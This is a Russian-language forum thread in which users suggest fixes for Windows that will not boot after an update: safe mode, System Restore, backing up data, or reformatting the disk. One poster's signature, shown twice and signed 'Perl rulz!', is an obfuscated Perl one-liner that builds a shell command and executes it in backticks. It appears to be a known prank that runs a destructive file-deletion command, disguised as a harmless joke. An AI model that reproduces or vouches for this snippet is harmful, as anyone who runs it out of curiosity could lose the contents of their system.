я однажды тоже на этом попался)
переустанавливать винду мне не помогло, я ее после этого вообще запускать не мог
помогло, когда я полностью винт отформатил, убив предварительно все разделы
вот так вот
может майнард еще с таким сталкивался, я хз, мож он знает как без формачения это сделать _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Можно форматнуть тот диск на котором винда, если там ещё чё кроме винды, то нужно разбить его, с помощю соответствующих прог. названий не помню. Вообщем не сложная проблема, но требует долгой мозгоебли.
Денис
А если то,что на диске кроме винды спасать не требуется,можно не разбивать? _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Кароче так.
1) Самы лёгкий способ, при загрузке жмёшь то-ли F8 то ли зажимаешь ctrl, появляется меню, там выбераешь строку на которой написано что-то типа "возрат к рабочей(или старой, я х.з.) версии винды"(очень дословно), потом загружаешься, если эта шняжная хренота опять выскакивает, пробуй ещё раз. Либо у тебя получится, либо пизда, хотя не должно по идее.
2)Если у тебя 2 или 3 диска:
Просто переносишь всё нужное с диска(например С, это тот на котором твоя апрейдная винда стоит) на диск (например D), потом тупо форматируешь диск С, и заново ставишь на него винду.
3)Если у тебя всего один диск, то его нужно разбить на два(можно и три и.т.д). Вообщем тут я ваабще не помню чё и как, но там вроде не сложно.
4)Отнеси в тех.центр, там тебе помогут, за бабки.
Вывод: пробуй способ 1, если не поможет пробуй ещё раз способ один, 2 и 3 это для компьютерных гениев.
Мишка
у меня была похожая хрень,было обновление из инета винды Сервис Пак 3 чтоли или два. не важно. так вот, у меня винда не запускалась. и я решил запустить её через безопасный режим-Получилось. Далее я сделал восстановление системы. И всё заработало.
да, кстати, восстановление системы тоже попробуй
но нужные данные на всякий случай все равно бэкапни
3)й вариант убьет все данные _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!